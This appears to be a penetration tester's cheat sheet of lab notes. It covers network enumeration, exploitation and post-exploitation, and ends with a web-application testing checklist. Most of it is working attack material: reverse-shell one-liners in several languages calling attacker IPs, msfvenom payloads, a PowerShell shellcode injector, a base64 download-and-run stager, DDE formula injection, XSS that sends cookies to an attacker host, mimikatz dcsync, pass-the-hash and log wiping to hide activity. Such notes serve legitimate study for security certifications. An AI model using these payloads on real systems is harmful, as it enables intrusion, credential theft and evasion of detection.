https://github.com/frizb/Vanquish
This is a multithreaded python program to scan for files on web servers
# python3 opendoor.py --host http://192.168.152.10 -p 9090 --scan=directories -t 50############################################################
# #
# _____ ____ ____ _ _ ____ _____ _____ ____ #
# ( _ )( _ \( ___)( \( ) ( _ \ ( _ )( _ )( _ \ #
# )(_)( )___/ )__) ) ( )(_) ) )(_)( )(_)( ) / #
# (_____)(__) (____)(_)\_) (____/ (_____)(_____)(_)\_) #
# #
# Directories: 36994 #
# Subdomains: 181018 #
# Browsers: 112 #
# Proxies: 204 #
# License: GNU General Public License #
############################################################
[08:33:03] warning: Threads has been reduced to 25 (max) instead of 50
[08:33:03] info: Use --report param to store your scan results
[08:33:03] info: Wait, please, checking connect to -> 192.168.152.10:9090 ...
[08:33:03] info: Server 192.168.152.10:9090 (192.168.152.10) is online!
[08:33:03] info: Scanning 192.168.152.10 ...
[08:33:03] info: 0.1% [00028/36994] - 0B - Denied http://192.168.152.10:9090/..;/
[08:33:08] info: 3.2% [01173/36994] - 0B - http://192.168.152.10:9090/325/ [08:33:08] warning: skip [00000/36994] - Ignored /404.php
[08:33:20] info: 11.4% [04205/36994] - 0B - Denied http://192.168.152.10:9090/a%5c.asp
[08:33:20] info: 11.4% [04208/36994] - 0B - Denied http://192.168.152.10:9090/a%5c.php
[08:33:20] info: 11.4% [04208/36994] - 0B - Denied http://192.168.152.10:9090/a%5c.aspx
[08:34:03] info: 40.7% [15043/36994] - 306B - http://192.168.152.10:9090/erika/ [08:34:03] warning: skip [00000/36994] - Ignored /error.php
[08:34:05] info: 42.4% [15674/36994] - 946B - OK http://192.168.152.10:9090/favicon.ico
[08:34:17] info: 51.7% [19114/36994] - 0B - http://192.168.152.10:9090/include.inc [08:34:17] warning: skip [00000/36994] - Ignored /index.php
[08:34:17] info: 51.8% [19148/36994] - 1KB - OK http://192.168.152.10:9090/index.html
[08:34:26] info: 58.3% [21578/36994] - 1KB - OK http://192.168.152.10:9090/login/
[08:34:48] info: 74.1% [27404/36994] - 2KB - OK http://192.168.152.10:9090/products/
[08:34:57] info: 80.3% [29693/36994] - 3KB - OK http://192.168.152.10:9090/search/
[08:35:27] info: 100.0% [36991/36994] - 0B - http://192.168.152.10:9090/~tmp/ +-------------------------------+-----------+
| Statistics (192.168.152.10) | Summary |
|-------------------------------+-----------|
| failed | 36982 |
| bad | 4 |
| ignored | 3 |
| success | 5 |
| items | 36994 |
| workers | 25 |
+-------------------------------+-----------+
[08:35:27] debug: Total time running: 0:02:23.799132 # nmap -sT -p111,1039,1047,1048,2049 -A 10.11.1.1-254 -oG lab_nfs_servers.txt
# egrep 'filtered|open' lab_nfs_servers.txt | awk '{ print $2 }' > lab_nfs_ips.txt
# nmap -p 111 --script nfs* -iL lab_nfs_ips.txt
https://www.exploit-db.com/google-hacking-database/
site:"megacorpone.com" -site:"www.megacorpone.com" filetype:ppt "penetration"
intitle:"VNC viewer for Java"
inurl:"robots.txt"
intitle:"-N3t" filetype:php undetectable -Sites compromised with backdoor
host -t ns megacorpone.com
host -t mx megacorpone.com
host -l megacorpone.com ns1.megacorpone.com -Check for zone transfer
nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
dnsenum
theharvester -d cisco.com -b google >google.txt -Email harvest from google.com
nmap 10.1.1.0/24 --exclude 10.1.1.34 10.1.1.45
# use good and avoid files
echo 10.1.1.34 10.1.1.45 > avoid.txt
echo 10.1.1.0/24 > good.txt
nmap -iL good.txt --excludefile avoid.txt
nmap -Pn --top-ports 20 192.168.186.0/24 --open -T4
nmap -sn 192.168.1.0/24 -oG ping-sweep-nmap.txt
grep Up ping-sweep.txt | cut -d " " -f 2
nmap -p 80 192.168.1.0/24 -oG ping-sweep-nmap.txt
grep open web-sweep.txt |cut -d" " -f2
We will host a socks4 proxy on 127.0.0.1:8080 and ssh to a machine with access to the 172.16.152.0/24 network
# Edit /etc/proxychains.conf and add the following after [ProxyList]
[kali@kali:~]$ grep socks4 /etc/proxychains.conf | grep -v "^#"
socks4 127.0.0.1 8080
# ssh to the Debian machine using the -D argument specifying the dynamic connection and list socket 127.0.0.1:8080 as the proxy
[kali@kali:~]$ sudo ssh -N -D 127.0.0.1:8080 [email protected]
You must prepend your commmand with proxychains. Be sure you don't sue the nmap "-sS" (TCP SYN scan)
[kali@kali:~]$ proxychains nmap --top-ports=20 -sT -Pn 172.16.152.5
nmap -sT -A --top-ports 20 192.168.1.0/24 --open -oG top-port.txt
nmap -v -p 80 --script all 192.168.1.1
$ sudo nmap 192.168.152.44 -p- -sV -vv --open --reason -oX 192.168.152.44.xml
smbclient -L //192.168.186.147 (commands - list, dir, mget * )
rpcclient -U "" 192.168.1.1
smbclient -U testuser //localhost/report-upload/
no password, hit <Enter>
if logged try srvinfo
enum4linux -v 192.168.152.109
nmap -p 139,445 --script smb-enum-users 192.168.1.0/24
nmap -p 135,139,445 --script smb-enum-shares 192.168.1.0/24
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.201
/root/mega/exploits/samba28 (made of 10.c) use exploit/linux/samba/trans2open (Unix Samba 2.2.0 to 2.2.8)
./samba28 -b 0 -v 10.11.1.28
use exploit/multi/samba/usermap_script (Samba 3.0.20 - 3.0.25)
use exploit/linux/samba/lsa_transnames_heap -Linux 3.0.21-3.0.24
EthernalBlue (zzz_ezploit.py creating user cplsec P@ssw0rd123! on the target)
nmap --script smtp-enum-users.nse -p 25,465,587 10.11.1.1-254 -oA .
Nmap scan report for 10.11.1.227
Host is up (0.049s latency).
PORT STATE SERVICE
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
nc -nv 192.168.1.2 25
HELO a
EXPN root -Enumeration
VRFY user -Enumeration
Writing mail:
MAIL FROM:root
RCPT TO:root
DATA Hello there
.
Enum automation:
for user in$(cat users.txt); do echo VRFY $user |nc -nv 192.168.1.2 25 2>/dev/null |grep ^"250" -Does not always work
use smtp-user-enum script from pentestmonkey
SNMP (udp 161):
onesixtyone -c community_strings.txt -i listIP.txt
onesixtyone -c snmp_strings.txt -i hosts.txt | cut -d " " -f 1 >> snmp_hosts.txt
I prefer to use snmp-check becuase it gives you a full useful report
# for ip in $(cat ips.txt); do snmp-check $ip; done
snmpwalk is good to enumerate individual MIBs
snmpwalk -c public -v1 -t 10 10.11.1.14
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: x86 Family 6 Model 12 Stepping 2 AT/AT COMPAT IBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)" iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (2005539644) 232 days, 2:56:36.44 iso.3.6.1.2.1.1.4.0 = ""
$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25
iso.3.6.1.4.1.77.1.2.25.1.1.3.98.111.98 = STRING: "bob"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.8.73.85.83.82.95.66.79.66 = STRING: "IUSR_BOB"
$ snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2
iso.3.6.1.2.1.25.4.2.1.2.1 = STRING: "System Idle Process"
iso.3.6.1.2.1.25.4.2.1.2.4 = STRING: "System"
iso.3.6.1.2.1.25.4.2.1.2.224 = STRING: "smss.exe"
iso.3.6.1.2.1.25.4.2.1.2.324 = STRING: "csrss.exe"
iso.3.6.1.2.1.25.4.2.1.2.364 = STRING: "wininit.exe"
$ snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.18646 = INTEGER: 21
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.45310 = INTEGER: 80
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.24806 = INTEGER: 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.45070 = INTEGER: 443
$ snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2
iso.3.6.1.2.1.25.6.3.1.2.1 = STRING: "LiveUpdate 3.3 (Symantec Corporation)" iso.3.6.1.2.1.25.6.3.1.2.2 = STRING: "WampServer 2.5"
iso.3.6.1.2.1.25.6.3.1.2.3 = STRING: "VMware Tools"
iso.3.6.1.2.1.25.6.3.1.2.4 = STRING: "Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148"
iso.3.6.1.2.1.25.6.3.1.2.5 = STRING: "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030"
# users
code="1.3.6.1.4.1.77.1.2.25"
for host in $(cat ips.txt); do echo -e "---------\nhost:$host\n-----------";snmpwalk -c public -v1 $host $code; done
# software Name
code="1.3.6.1.2.1.25.6.3.1.2"
for host in $(cat ips.txt); do echo -e "---------\nhost:$host\n-----------";snmpwalk -c public -v1 $host $code; done
#
1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
VNC:
vncviewer 192.168.1.116::5901
hydra -p "password" vnc://192.168.1.117:5901
hydra -P /usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt -s 5901 192.168.1.116 vnc
while true;do bash -i >& /dev/tcp/IP/1337 0>&1;nc -e /bin/sh IP 1337;perl -e 'use Socket;$i="IP";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';php -r '$sock=fsockopen("IP",1337);exec("/bin/sh -i <&3 >&3 2>&3");';ruby -rsocket -e'f=TCPSocket.open("IP",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)';sleep 5;done
bash -i >& /dev/tcp/10.11.0.76/444 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.114.137 443 >/tmp/f
Add SSH keys: ssh-keygen -t rsa -b 2048
root.c:
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
rm -f /tmp/p; mknod /tmp/p p && nc <attacker-ip> 4444 0/tmp/p
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker-ip> 80 0/tmp/p
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import pty; pty.spawn("/bin/bash")'
Linux:
wget -O exploit.c https://www.exploit-db.com/exploits/18411 -CVE 2012-0056 root for >=2.6.39 (Ubuntu 11.10, kernel 3.0.0-12)
gcc exploit.c -o exploit -Compile to binary
Get Win compiler:
sudo apt-get install mingw-w64
i686-w64-mingw32-gcc slmail-win-fixed.c -lws2_32 -o s.exe -For x86
x86_64-w64-mingw32-gcc -o main64.exe main.c -For x64
i585-mingw32msvc-gcc file_name.c -lws2_32 -o exploit.exe
wine exploit.exe -To run Windows file in Linux
Windows:
wget -O ms11-080.py https://www.exploit-db.com/exploits/18176 -MS11-080 (WinXP and 2003)
python pyinstaller.py --onefile ms11-080.py -Create an exe out of python
xfreerdp /u:administrator /d:thinc /pth:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e /v:10.11.1.221
Find and remove ossec-alerts.log, access.log, httpd-access.log
echo > .bash_history
DDE inj in xlsx
=cmd|'/c powershell.exe -w hidden $e=(Copy-Item -Path c:\Te\12345.txt -Destination C:\Users\test\12345); powershell -e $e'!A1
=cmd|'/c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://1.2.3.4/test.exe\"); powershell -e $e'!A1
HTTP2 https://www.youtube.com/watch?v=YHOnxlQ6zec
In wireshark: http2.data.data && http2 contains username
nghttp -v -u http://http2.sec642.org/../../../../etc/passwd doesn't work, need to be encoded
curl2 --http2 http://http2.sec642.org/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
curl --http2-prior-knowledge --data "status=on" http://localhost:8080/index.ph
connect-msolservice -credential $msolcred
Get-MsolUser -All | ft -AutoSize
Kali nc -nv 192.168.152.10 110
Kali nc -nv 192.168.152.10 4444
Windows nc.exe -nlvp 4444
Kali nc -nv 192.168.152.10 4444 < /usr/share/windows-binaries/wget.exe
Windows nc.exe -nlvp 4444 > wget.exe
There is no output letting you know when the transfer is complete
Windows listens on port 4444, runs cmd.exe
Windows nc.exe -nlvp 4444 -e cmd.exe
Kali nc -nv 192.168.152.10 4444
$client = New-Object System.Net.Sockets.TCPClient("192.168.119.152",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
sudo nc -nlvp 4242
Windows nc.exe -nlvp 4444
Kali nc -nv 192.168.152.10 4444 -e /bin/bash
Windows You will not see a Linux prompt
Note: we are hosting netcat on the source system (192.168.119.152) at nc.exe.txt
http://192.168.152.10/menu.php?file=data:text/plain,<?php echo shell_exec("certutil -urlcache -split -f http://192.168.119.152/nc.exe.txt c:\windows\system32\nc.exe") ?>
http://192.168.152.10/menu.php?file=data:text/plain,<?php echo shell_exec("nc.exe -nlvp 4444 -e cmd.exe") ?>
# connect to the bind shell from attacker machine
# nc -nv 192.168.152.10 4444
<?php shell_exec("bash -i >& /dev/tcp/10.11.0.61/5555 0>&1") ?>
<?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?>
<?php $sock=fsockopen("10.11.0.61",5555);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Good info on windows assembly and exploits: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
https://github.com/Screetsec/TheFatRat
https://github.com/Yt1g3r/CVE-2018-8174_EXP
List payloads
msfvenom -l
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Use shellpop to create a reverse shell with a python stager
# shellpop --payload linux/reverse/tcp/php --host tun0 --port 4444 --handler --base64 --stager http
Copy the generated code into our exploit
payload = "<?php echo shell_exec('echo cHl0aG9uIC1jICJmcm9tIHJlcXVlc3RzIGltcG9ydCBnZXQ7aW1wb3J0IG9zO29zLnN5c3RlbShnZXQoJ2h0dHA6Ly8xOTIuMTY4LjExOS4xNTI6ODAvRHJkclhhaFknKS50ZXh0KSIg|base64 -d|/bin/bash') ?>"
Listen locally on port 4444:
# nc -nlvp 4444
Run the exploit to invoke the payload and have the target connect back to you on port 4444
If you uploaded the payload, call it with curl or alternative
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=4444 -f powershell
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x0,0x0,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x7,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x1,0x0,0x0,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x68,0xc0,0xa8,0x77,0x98,0x68,0x2,0x0,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0xff,0x4e,0x8,0x75,0xec,0xe8,0x67,0x0,0x0,0x0,0x6a,0x0,0x6a,0x4,0x56,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x56,0x6a,0x0,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x0,0x56,0x53,0x57,0x68,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x68,0x0,0x40,0x0,0x0,0x6a,0x0,0x50,0x68,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0xc,0x24,0xf,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x1,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
One command at a time:
service postgresql start
sudo msfdb init
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
exploit
All at once:
msfconsole -x "use exploit/multi/handler; set RHOST 192.168.152.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit"
This file will:
- Using the native "certuil.exe", download nc.exe.txt from the kali box and save it as C:\windows\system32\nc.exe
- Create a listening socket on TCP 4444 (Windows Machine)
#include <stdlib.h>
#include <windows.h>
int main ()
{
int i;
i = system ("certutil -urlcache -split -f http://192.168.119.152/nc.exe.txt c:\\windows\\system32\\nc.exe");
Sleep(10000); // 10 seconds (10000 milliseconds)
i = system ("nc.exe -nlvp 4444 -e cmd.exe");
return 0;
}
sudo i686-w64-mingw32-gcc winshell.c -o winshell.exe
nc -nv 192.168.152.10 4444
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 EXITFUNC=thread -e x86/xor_dynamic -b "\x00\x09\x0a\x1a\x10" -f python
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x09\x0a\x1a\x10" -f python
sudo service postgresql start
sudo msfdb init
msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 192.168.152.10
rhost => 192.168.152.10
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.152.10:4444
[*] Sending stage (180291 bytes) to 192.168.152.10
[*] Meterpreter session 1 opened (192.168.119.152:33035 -> 192.168.152.10:4444) at 2020-04-06 02:55:29 -0400
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
username: tom' or 1=1 LIMIT 1;#
Cheatsheet https://owasp.org/www-community/xss-filter-evasion-cheatsheet
<script>alert(‘XSS’)</script>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT># Start a listener on your attacking machine
sudo nc -nvlp 4444# input the code below in to the vulnerable appliction
<iframe src=http://192.168.119.152:4444/report height=”0” width=”0”></iframe># Start a listener on your attacking machine
sudo nc -nvlp 80# input code below in to the vulnerble web app
<script>new Image().src="http://192.168.119.152/cool.jpg?output="+document.cookie;</script>Use Firefox-Addon "Cookie Editor" to use the cookie: https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.152 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta
Run this from Windows Command Prompt
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0
This will run a smb server called \\kali on your machine
sudo impacket-smbserver kali /home/kali -smb2support -username kali -password kali
On Windows host (target machine connecting back to your new smb share)
net use k: \\192.168.119.152\kali /user:kali kali
The command completed successfully.
C:\>k:
K:\>
We are trying to forward traffic on local socket 192.168.152.10:4455 to remote socket 172.16.152.5:445
Windows 2016 Server: 172.16.152.5 Windows 10 Client: 192.168.152.10
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=192.168.152.10 connectport=445 connectaddress=172.16.152.5
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=192.168.152.10 localport=4455 action=allow
$ grep "SMB2" "/etc/samba/smb.conf"
min protocol = SMB2
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //192.168.152.10/Data -o username=Administrator,password=lab /mnt/win10_share
ls -l /mnt/win10_share/
To forward local port 3306 (from target) to the attacker (192.168.119.152) local port 1235 run the following command:
cmd /c echo y | plink.exe -batch -ssh -l kali -pw kali -R 192.168.119.152:1235:127.0.0.1:3306 192.168.119.152
Execution Policy Unrestricted
set-executionpolicy unrestricted
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152/powerview.ps1');Get-NetSession -ComputerName dc01 | Format-Table
C:\tools\active_directory> Import-Module .\PowerView.ps1
Get-NetSession -ComputerName dc01 | Format-Table
Invoke-EnumerateLocalAdmin | Format-Table
privilege::debug
lsadump::dcsync /domain:corp.com /all /csv
Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
Perform Web Application Fingerprinting
Identify technologies used
Identify user roles
Identify application entry points
Identify client-side code
Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
Identify co-hosted and related applications
Identify all hostnames and ports
Identify third-party hosted content
Check for commonly used application and administrative URLs
Check for old, backup and unreferenced files
Check HTTP methods supported and Cross Site Tracing (XST)
Test file extensions handling
Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
Test for policies (e.g. Flash, Silverlight, robots)
Test for non-production data in live environment, and vice-versa
Check for sensitive data in client-side code (e.g. API keys, credentials)
Check SSL Version, Algorithms, Key length
Check for Digital Certificate Validity (Duration, Signature and CN)
Check credentials only delivered over HTTPS
Check that the login form is delivered over HTTPS
Check session tokens only delivered over HTTPS
Check if HTTP Strict Transport Security (HSTS) in use
Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (eg Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of channel notification of account lockouts and successful password changes
Test for consistent authentication across applications with shared authentication schema / SSO
Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
Check session tokens for cookie flags (httpOnly and secure)
Check session cookie scope (path and domain)
Check session cookie duration (expires and max-age)
Check session termination after a maximum lifetime
Check session termination after relative timeout
Check session termination after logout
Test to see if users can have multiple simultaneous sessions
Test session cookies for randomness
Confirm that new session tokens are issued on login, role change and logout
Test for consistent session management across applications with shared session management
Test for session puzzling
Test for CSRF and clickjacking
Test for path traversal
Test for bypassing authorization schema
Test for vertical Access control problems (a.k.a. Privilege Escalation)
Test for horizontal Access control problems (between two users at the same privilege level)
Test for missing authorization
Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie
Test for anti-automation
Test for account lockout
Test for HTTP protocol DoS
Test for SQL wildcard DoS
Test for feature misuse
Test for lack of non-repudiation
Test for trust relationships
Test for integrity of data
Test segregation of duties
Check if data which should be encrypted is not
Check for wrong algorithms usage depending on context
Check for weak algorithms usage
Check for proper use of salting
Check for randomness functions
Test that acceptable file types are whitelisted
Test that file size limits, upload frequency and total file counts are defined and are enforced
Test that file contents match the defined file type
Test that all file uploads have Anti-Virus scanning in-place.
Test that unsafe filenames are sanitised
Test that uploaded files are not directly accessible within the web root
Test that uploaded files are not served on the same hostname/port
